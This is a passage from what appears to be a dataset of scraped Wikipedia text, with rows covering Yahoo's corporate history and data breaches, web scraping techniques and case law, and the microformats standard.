However, after the dot-com bubble burst, it reached a post-bubble low of $8.11 on September 26, 2001. 32 Yahoo began using Google for search in June 2000. 33 34 Over the next four years, it developed its own search technologies, which it began using in 2004 partly using technology from its $280 million acquisition of Inktomi in 2002. 35 In response to Google's Gmail, Yahoo began to offer unlimited email storage in 2007. In 2008, the company laid off hundreds of people as it struggled from competition. 36 In February 2008, Microsoft made an unsolicited bid to acquire Yahoo for $44.6 billion. 37 38 Yahoo rejected the bid, claiming that it "substantially undervalues" the company and was not in the interest of its shareholders. Although Microsoft increased its bid to $47 billion, Yahoo insisted on another 10% increase to the offer and Microsoft cancelled the offer in May 2008. 39 40 41 42 Carol Bartz, who had no previous experience in Internet advertising, replaced Yang as CEO in January 2009. 43 44 In September 2011, after failing to meet targets, she was fired by chairman Roy J. Bostock; CFO Tim Morse was named as Interim CEO of the company. 45 46 In April 2012, after the appointment of Scott Thompson as CEO, several key executives resigned, including chief product officer Blake Irving. 47 48 On April 4, 2012, Yahoo announced 2,000 layoffs, 49 or about 14% of its 14,100 workers by the end of year, expected to save around $375 million annually. 50 In an email sent to employees in April 2012, Thompson reiterated his view that customers should come first at Yahoo. He also completely reorganized the company. 51 On May 13, 2012, Thompson was fired and was replaced on an interim basis by Ross Levinsohn, recently appointed head of Yahoo's new Media group. Several associates of Third Point Management, including Daniel S. Loeb were nominated to the board of directors. 52 51 53 54 Thompson's total compensation for his 130 day tenure with Yahoo was at least $7.3 million. 55 On July 15, 2012, Marissa Mayer was appointed president and CEO of Yahoo, effective July 17, 2012. 56 57 In June 2013, Yahoo acquired blogging site Tumblr for $1.1 billion in cash, with Tumblr's CEO and founder David Karp continuing to run the site. 58 59 60 61 In July 2013, Yahoo announced plans to open an office in San Francisco. 62 On August 2, 2013, Yahoo acquired Rockmelt; its staff was retained, but all of its existing products were terminated. 63 Data collated by comScore during July 2013 revealed that, during the month, more people in the U.S. visited Yahoo websites than Google; the first time that Yahoo outperformed Google since 2011. 64 The data did not count mobile usage, nor Tumblr. 65 Mayer also hired Katie Couric to be the anchor of a new online news operation and started an online food magazine. However, by January 2014, doubts about Mayer's progress emerged when Mayer fired her own first major hire, Henrique de Castro. 66 On December 12, 2014, Yahoo acquired video advertising provider BrightRoll for $583 million. 67 On November 21, 2014, Yahoo acquired Cooliris. 68 In August 2023, it was announced Yahoo had acquired the San Francisco-headquartered social investing platform, Commonstock. 69 In April 2024, it was announced Yahoo had acquired the AI-driven news aggregator app, Artifact. 70 By December 2015, Mayer was criticized as performance declined. 71 72 73 74 Mayer was ranked as the least likable CEO in tech. 75 76 On February 2, 2016, Mayer announced layoffs amounting to 15% of the Yahoo workforce. 
77 On July 25, 2016, Verizon Communications announced the acquisition of Yahoo's core Internet business for $4.83 billion. 78 79 80 81 The deal excluded Yahoo's 15% stake in Alibaba Group and 35.5% stake in Yahoo Japan. 82 83 On February 21, 2017, as a result of the Yahoo data breaches, Verizon lowered its purchase price for Yahoo by $350 million and reached an agreement to share liabilities regarding the data breaches. 84 85 On June 13, 2017, Verizon completed the acquisition of Yahoo and Marissa Mayer resigned. 86 87 Yahoo, AOL, and HuffPost were to continue operating under their own names, under the umbrella of a new company, Oath Inc., later called Verizon Media. 88 89 The parts of the original Yahoo Inc. which were not purchased by Verizon Communications were renamed Altaba, which was later liquidated, making a final distribution in October 2020. 90 In September 2021, investment funds managed by Apollo Global Management acquired 90% of Yahoo. 91 92 In November 2021, Yahoo announced that it was ending operations in mainland China due to the increasingly challenging business and legal environment. 93 Previously, the company discontinued China Yahoo Mail on August 20, 2013. 94 In 2023, Yahoo announced that it would cut 20% of its workforce. The move followed mass layoffs from other tech giants including Google, Microsoft, Twitter, Inc, Meta, and Amazon. The company is set to lay off roughly 1,000 staff members of their 8,600 workers. 95 Eleven chief executives and interim leaders have led the Yahoo companies since 1995. They are: For a list of all current and defunct services offered by Yahoo, see List of Yahoo owned sites and services. On September 22, 2016, Yahoo disclosed a data breach that occurred in late 2014, in which information associated with at least 500 million user accounts, 101 102 one of the largest breaches reported to date. 103 The United States indicted four men, including two employees of Russia's Federal Security Service (FSB), for their involvement in the hack. 104 105 On December 14, 2016, the company revealed that another separate data breach had occurred in 2014, with hackers obtaining sensitive account information, including security questions, to at least one billion accounts. 106 The company stated that hackers had utilized stolen internal software to forge HTTP cookies. 107 108 On October 3, 2017, the company stated that all 3 billion of its user accounts were affected by the August 2013 theft. 109 110 111 112 113 On November 30, 2009, Yahoo was criticized by the Electronic Frontier Foundation for sending a DMCA notice to whistleblower website "Cryptome" for publicly posting details, prices, and procedures on obtaining private information pertaining to Yahoo's subscribers. 114 After some concerns over censorship of private emails regarding a website affiliated with Occupy Wall Street protests were raised, Yahoo responded with an apology and explained it as an accident. 115 116 117 On September 11, 2001, Yahoo announced its partnership with FIFA for the 2002 FIFA World Cup and 2006 FIFA World Cup tournaments. It was one of FIFA's 15 partners at the tournaments. The deal included co-branding the organization's websites. 118 Yahoo sponsored the 2012 Sundance Film Festival. 119 NBC Sports Group aligned with Yahoo Sports the same year with content and program offerings on mobile and desktop platforms. 120 Yahoo announced television video partnerships in 2013 with Cond Nast, 121 WWE, ABC NEWS, and CNBC. 
122 Yahoo entered into a 10 year collaboration in 2014, as a founding partner of Levi's Stadium, home of the San Francisco 49ers. 123 The National Basketball Association partnered with Yahoo Sports to stream games, offer virtual and augmented-reality fan experiences, and in 2018 NBA League Pass. 124 125 Yahoo Sportsbook launched in November 2019, a collaboration with BetMGM. 126 127 BuzzFeed acquired HuffPost from Yahoo in November 2020, in a stock deal with Yahoo as a minority shareholder. 128 129 The NFL partnered with Yahoo in 2020, to introduce a new "Watch Together" function on the Yahoo Sports app for interactive co-viewing through a synchronized livestream of local and primetime NFL games. 130 The Paley Center for Media collaborated with Verizon Media to exclusively stream programs on Yahoo platforms beginning in 2020. 131 Yahoo became the main sponsor for the Pramac Racing team and the first title sponsor for the 2021 ESport MotoGP Championship season. 132 Yahoo, the official partner for the September 2021 New York Fashion Week event also unveiled sponsorship for the Rebecca Minkoff collection via a NFT space. 133 In September 2021, it was announced that Yahoo partnered with Shopify, connecting the e-commerce merchants on Yahoo Finance, AOL and elsewhere. 134 |
455 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-2 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
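The row above notes that a simple yet powerful scraping approach is plain regular-expression matching, which fits this notebook since requests and re are already imported. The sketch below is a hedged illustration of that idea against a placeholder URL (example.com); regex extraction is brittle on real HTML, which is why the article goes on to discuss DOM parsing.
import re
import requests

# Placeholder target; substitute any page you are allowed to scrape.
html = requests.get("https://example.com", timeout=10).text

# Regular-expression extraction: pull hyperlinks and e-mail addresses straight out of the markup.
links = re.findall(r'href="(https?://[^"]+)"', html)
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)
print(links[:5])
print(emails[:5])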
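For the DOM-parsing approach mentioned in the same row, a common Python route is lxml, which builds a DOM tree and answers XPath queries against it. This is a sketch only: lxml is not installed by the cells at the top of this notebook (pip install lxml), and example.com is again a stand-in URL.
import requests
from lxml import html  # assumed installed separately: pip install lxml

page = requests.get("https://example.com", timeout=10)
doc = html.fromstring(page.content)   # parse the response into a DOM tree

headings = doc.xpath("//h1/text()")   # XPath query: text of every <h1>
hrefs = doc.xpath("//a/@href")        # XPath query: href attribute of every link
print(headings)
print(hrefs[:5])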
456 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Microformat | Microformats ( F) note 1 are a set of defined HTML classes created to serve as consistent and descriptive metadata about an element, designating it as representing a certain type of data (such as contact information, geographic coordinates, events, blog posts, products, recipes, etc.). 1 They allow software to process the information reliably by having set classes refer to a specific type of data rather than being arbitrary. Microformats emerged around 2005 and were predominantly designed for use by search engines, web syndication and aggregators such as RSS. 2 Google confirmed in 2020 that it still parses microformats for use in content indexing. 3 Microformats are referenced in several W3C social web specifications, including IndieAuth 4 and Webmention. 5 Although the content of web pages has been capable of some "automated processing" since the inception of the web, such processing is difficult because the markup elements used to display information on the web do not describe what the information means. 6 Microformats can bridge this gap by attaching semantics, and thereby obviating other, more complicated, methods of automated processing, such as natural language processing or screen scraping. The use, adoption and processing of microformats enables data items to be indexed, searched for, saved or cross-referenced, so that information can be reused or combined. 6 As of 2013 update , microformats allow the encoding and extraction of event details, contact information, social relationships and similar information. Microformats2, abbreviated as mf2, is the updated version of microformats. Mf2 provides a more easy way of interpreting HTML structured syntax and vocabularies than the earlier ways that made use of RDFa and microdata. 7 Microformats emerged around 2005 note 2 as part of a grassroots movement to make recognizable data items (such as events, contact details or geographical locations) capable of automated processing by software, as well as directly readable by end-users. 6 note 3 Link-based microformats emerged first. These include vote links that express opinions of the linked page, which search engines can tally into instant polls. 8 CommerceNet, a nonprofit organization that promotes e-commerce on the Internet, has helped sponsor and promote the technology and support the microformats community in various ways. 8 CommerceNet also helped co-found the Microformats.org community site. 8 Neither CommerceNet nor Microformats.org operates as a standards body. The microformats community functions through an open wiki, a mailing list, and an Internet relay chat (IRC) channel. 8 Most of the existing microformats originated at the Microformats.org wiki and the associated mailing list citation needed by a process of gathering examples of web-publishing behaviour, then codifying it. Some other microformats (such as rel nofollow and unAPI) have been proposed, or developed, elsewhere. XHTML and HTML standards allow for the embedding and encoding of semantics within the attributes of markup elements. Microformats take advantage of these standards by indicating the presence of metadata using the following attributes: For example, in the text "The birds roosted at 52.48, 1.89" is a pair of numbers which may be understood, from their context, to be a set of geographic coordinates. 
With wrapping in spans (or other HTML elements) with specific class names (in this case geo, latitude and longitude, all part of the geo microformat specification): software agents can recognize exactly what each value represents and can then perform a variety of tasks such as indexing, locating it on a map and exporting it to a GPS device. In this example, the contact information is presented as follows: With hCard microformat markup, that becomes: Here, the formatted name (fn), organisation (org), telephone number (tel) and web address (url) have been identified using specific class names and the whole thing is wrapped in class "vcard", which indicates that the other classes form an hCard (short for "HTML vCard") and are not merely coincidentally named. Other, optional, hCard classes also exist. Software, such as browser plug-ins, can now extract the information, and transfer it to other applications, such as an address book. For annotated examples of microformats on live pages, see HCard Live example and Geo (microformat) Usage. Several microformats have been developed to enable semantic markup of particular types of information. However, only hCard and hCalendar have been ratified, the others remaining as drafts: Using microformats within HTML code provides additional formatting and semantic data that applications can use. For example, applications such as web crawlers can collect data about online resources, or desktop applications such as e-mail clients or scheduling software can compile details. The use of microformats can also facilitate "mash ups" such as exporting all of the geographical locations on a web page into (for example) Google Maps to visualize them spatially. Several browser extensions, such as Operator for Firefox and Oomph for Internet Explorer, provide the ability to detect microformats within an HTML document. When hCard or hCalendar are involved, such browser extensions allow microformats to be exported into formats compatible with contact management and calendar utilities, such as Microsoft Outlook. When dealing with geographical coordinates, they allow the location to be sent to applications such as Google Maps. Yahoo Query Language can be used to extract microformats from web pages. 16 On 12 May 2009 Google announced that they would be parsing the hCard, hReview and hProduct microformats, and using them to populate search result pages. 17 They subsequently extended this in 2010 to use hCalendar for events and hRecipe for cookery recipes. 18 Similarly, microformats are also processed by Bing 19 and Yahoo . 20 As of late 2010, these are the world's top three search engines. 21 Microsoft said in 2006 that they needed to incorporate microformats into upcoming projects, 22 as did other software companies. Alex Faaborg summarizes the arguments for putting the responsibility for microformat user interfaces in the web browser rather than making more complicated HTML: 23 Various commentators have offered review and discussion on the design principles and practical aspects of microformats. Microformats have been compared to other approaches that seek to serve the same or similar purpose. 24 As of 2007 update , there had been some criticism of one, or all, microformats. 24 The spread and use of microformats was being advocated as of 2007 update . 25 26 Opera Software CTO and CSS creator H kon Wium Lie said in 2005 "We will also see a bunch of microformats being developed, and that’s how the semantic web will be built, I believe. 
27 However, in August 2008 Toby Inkster, author of the "Swignition" (formerly "Cognition") microformat parsing service, pointed out that no new microformat specifications had been published since 2005. 28 Computer scientist and entrepreneur Rohit Khare stated that reduce, reuse, and recycle is "shorthand for several design principles" that motivated the development and practices behind microformats. 8 : 71 72 These aspects can be summarized as follows: Because some microformats make use of the title attribute of HTML's abbr element to conceal machine-readable data (particularly date-times and geographical coordinates) in the "abbr design pattern", the plain text content of the element is inaccessible to screen readers that expand abbreviations. 29 In June 2008 the BBC announced that it would be dropping use of microformats using the abbr design pattern because of accessibility concerns. 30 Microformats are not the only solution for providing "more intelligent data" on the web; alternative approaches are used and are under development. For example, the use of XML markup and standards of the Semantic Web are cited as alternative approaches. 8 Some contrast these with microformats in that they do not necessarily coincide with the design principles of "reduce, reuse, and recycle", at least not to the same extent. 8 One advocate of microformats, Tantek Çelik, characterized a problem with alternative approaches: Here's a new language we want you to learn, and now you need to output these additional files on your server. It's a hassle. (Microformats) lower the barrier to entry. 6 For some applications the use of other approaches may be valid. If the type of data to be described does not map to an existing microformat, RDFa can embed arbitrary vocabularies into HTML, such as for example domain-specific scientific data such as zoological or chemical data for which there is no microformat. Standards such as W3C's GRDDL allow microformats to be converted into data compatible with the Semantic Web. 31 Another advocate of microformats, Ryan King, put the compatibility of microformats with other approaches this way: Microformats provide an easy way for many people to contribute semantic data to the web. With GRDDL all of that data is made available for RDF Semantic Web tools. Microformats and GRDDL can work together to build a better web. 31 Microformats2 was proposed and discussed during FOOEast, 2010-05-02. 32 Microformats2 was intended to make it easier for authors to publish microformats and for developers to consume them, while remaining backwards compatible. 33 Using microformats2, the example above would be marked up as: and: |
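Because the hCard class names described in the row above (vcard, fn, org, tel, url) are ordinary HTML classes, they can be read with the BeautifulSoup import from the setup cells. The snippet below is a made-up, minimal hCard used only for illustration; real pages may carry many additional optional hCard classes.
from bs4 import BeautifulSoup  # already imported in the setup cells above

# A minimal, made-up hCard snippet using the class names discussed above.
html_snippet = """
<div class="vcard">
  <span class="fn">Jane Doe</span>
  <span class="org">Example Corp</span>
  <span class="tel">+1-555-0100</span>
  <a class="url" href="https://example.com">example.com</a>
</div>
"""

soup = BeautifulSoup(html_snippet, "html.parser")
card = soup.find(class_="vcard")
contact = {
    "name": card.find(class_="fn").get_text(strip=True),
    "organisation": card.find(class_="org").get_text(strip=True),
    "telephone": card.find(class_="tel").get_text(strip=True),
    "website": card.find(class_="url")["href"],
}
print(contact)  # {'name': 'Jane Doe', 'organisation': 'Example Corp', ...}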
457 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-23 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
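Where a site exposes its data as a JSON feed, as described above, scraping the feed is usually simpler than parsing the rendered HTML. Here is a minimal sketch using the requests library already imported in this notebook; the endpoint URL and field names are hypothetical placeholders.

import requests

FEED_URL = "https://example.com/api/products.json"   # placeholder endpoint, not a real API

def fetch_price_feed(url=FEED_URL):
    """Fetch a JSON data feed and return it as a list of records."""
    response = requests.get(url, timeout=10)
    response.raise_for_status()        # fail loudly on HTTP errors
    return response.json()             # requests decodes the JSON body

# Example usage for price-change monitoring (field names are assumptions):
# for item in fetch_price_feed():
#     print(item.get("name"), item.get("price"))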
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from 